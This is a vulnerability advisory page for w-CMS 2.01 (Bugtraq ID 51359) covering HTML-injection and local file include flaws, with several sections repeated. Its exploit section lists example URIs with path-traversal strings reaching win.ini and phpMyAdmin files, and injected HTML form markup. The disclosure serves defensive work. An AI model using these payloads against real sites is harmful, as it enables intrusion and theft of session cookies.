w-CMS HTML Injection and Local File Include Vulnerabilities
BID:51359
Info
w-CMS HTML Injection and Local File Include Vulnerabilities
| Bugtraq ID: | 51359 |
| Class: | Input Validation Error |
| CVE: |
CVE-2012-6522 CVE-2012-6523 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 10 2012 12:00AM |
| Updated: | Mar 19 2015 07:34AM |
| Credit: | th3.g4m3_0v3r |
| Vulnerable: |
w-CMS w-CMS 2.01 |
| Not Vulnerable: | |
Discussion
w-CMS HTML Injection and Local File Include Vulnerabilities
w-CMS is prone to multiple HTML-injection vulnerabilities and a local file-include vulnerability.
Exploiting these issues could allow an attacker to execute arbitrary HTML and script code in the context of the affected browser, steal cookie-based authentication credentials, and execute arbitrary local scripts in the context of the webserver process. Other attacks are also possible.
w-CMS 2.0.1 is vulnerable; other versions may also be affected.
w-CMS is prone to multiple HTML-injection vulnerabilities and a local file-include vulnerability.
Exploiting these issues could allow an attacker to execute arbitrary HTML and script code in the context of the affected browser, steal cookie-based authentication credentials, and execute arbitrary local scripts in the context of the webserver process. Other attacks are also possible.
w-CMS 2.0.1 is vulnerable; other versions may also be affected.
Exploit / POC
w-CMS HTML Injection and Local File Include Vulnerabilities
An attacker can exploit these issues through a browser.
The following example URIs are available:
Local file include:
http://www.example.com/wcms-2.01_2/?p=../../../../../../../../../../windows/win.ini
http://www.example.com/wcms-2.01_2/?p=../../../../../phpMyAdmin/db_create.php
HTML injection:
http://www.example.com/index.php?bid=1&COMMENT=1[HTML]
http://www.example.com/?p=3[HTML]
http://www.example.com/?bid=5&p=1[HTML]
http://www.example.com/?p=3<FORM action="Default.asp?PageId=-1" method=POST id=searchFORMname=searchFORM style="margin:0;padding:0"><INPUT type="hidden" value="" name="txtSEARCH"></FORM>
An attacker can exploit these issues through a browser.
The following example URIs are available:
Local file include:
http://www.example.com/wcms-2.01_2/?p=../../../../../../../../../../windows/win.ini
http://www.example.com/wcms-2.01_2/?p=../../../../../phpMyAdmin/db_create.php
HTML injection:
http://www.example.com/index.php?bid=1&COMMENT=1[HTML]
http://www.example.com/?p=3[HTML]
http://www.example.com/?bid=5&p=1[HTML]
http://www.example.com/?p=3<FORM action="Default.asp?PageId=-1" method=POST id=searchFORMname=searchFORM style="margin:0;padding:0"><INPUT type="hidden" value="" name="txtSEARCH"></FORM>
Solution / Fix
w-CMS HTML Injection and Local File Include Vulnerabilities
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].